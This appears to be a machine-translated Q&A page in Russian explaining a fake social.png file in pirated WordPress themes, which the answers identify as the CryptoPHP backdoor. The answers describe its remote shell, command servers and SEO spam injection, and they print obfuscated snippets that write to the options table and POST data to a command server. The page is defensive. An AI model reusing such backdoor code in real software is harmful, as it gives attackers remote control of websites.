Intereting Posts
Использование операторов сравнения в PHP-переключателе MYSQL PHP Предупреждение: mysql_query () ожидает, что параметр 1 будет строкой Показывать страницу ожидания при перезагрузке сервера Устанавливает ли безопасное разрешение для доступа к папке 777? Возможно ли получить PID процесса, запущенного exec () в Windows XP? Аутентификация Laravel 5 в субдомене не работает Как скрыть шаблон в WordPress? Оптимизация одновременных запросов ImageMagick с использованием redis / php-resque Symfony2 & Doctrine: создание пользовательского SQL-запроса WordPress: Комментарии: Отправка комментария открывает связанный пост Переименование функций во время выполнения в PHP mysqli или умереть, нужно ли умирать? Скрытие или удаление имени контроллера в URL-адресе с использованием маршрутов для seo-цели = codeigniter Обтекание длинного текста в CSS Вызов функции-члена bind_param () для не-объекта, не работающего внутри функции, вызванного из другой функции

Какова цель странного ложного social.png во многих словах WordPress

Я загрузил некоторые темы WordPress с веб-сайта, и я заметил, что в файл social.png входит social.png . Глядя на этот файл, это не настоящий png-файл, а скрипт php, который содержит непонятный непонятный код, и тот же самый для многих плагинов WordPress, распространяемых с других сайтов.

Размер файла составляет 45 кб и имеет этот хэш 3FFC93695CA3C919F36D52D07BDB5B198E7C6D63

Кто-то имеет представление о функции этого файла?

ЭТО файл

Согласно сообщению этого форума :

В принципе, это обратный вызов удаленной оболочки, который использует шифрование с открытым ключом, чтобы позволить хакеру запускать код на вашем сервере. Он генерирует пару ключей RSA для каждой установки, выгружает его на сервер команд (который имеет предварительно заданный список, но может динамически обновляться с других зараженных хостов, чтобы избежать его закрытия) с помощью встроенного ключа, а также отправляет список возможности (eval / exec enabled, информация о сервере) и отправляет их по электронной почте в список писем, найденных в файле.

Он использует конфигурационную систему WordPress для хранения своих данных, поэтому посмотрите в своей базе данных на ключ настройки WP_CLIENT_KEY, который будет выглядеть как куча искаженного текста.

После активации эксплойт возьмет список команд для eval на сервере – возможно, больше оболочек или эксплойтов, а также добавит строки в нижний колонтитул страницы. Эти строки, вероятно, являются шпионами blackhat SEO, но он также вводит список серверов управления и управления, с которыми он находится в контакте, так как любые другие зараженные сайты будут использовать ваш сервер для поиска других.

Как я заметил в комментариях, сценарий будет обновлять и хранить данные в базе данных WP:

 $AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')"); ... 

Как указано в сообщении форума, для доступа к скрипту. Сценарий также отправляет данные, предположительно открытый ключ, на указанный сервер через запрос shell POST :

 curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv"); curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true); if (isset($WbKPQMoSbMZkXUeYKXRI)) { curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI); } 

Независимо от точной цели сценария, вы должны удалить все ссылки на него и полностью избавиться от скрипта .

Это взломать WordPress с помощью фальшивых изображений png. Быть осторожен!

@AndreaF – Потрясение действительно? Файл хакерской версии social.png CryptoPHP предназначен только для пиратских / украденных программ (плагинов, тем и т. Д.). Этот тип взлома троянских коней продолжается вечно. Если вы попытаетесь получить что-то пиратское / украденное бесплатно, то ожидайте, что будете страдать от последствий.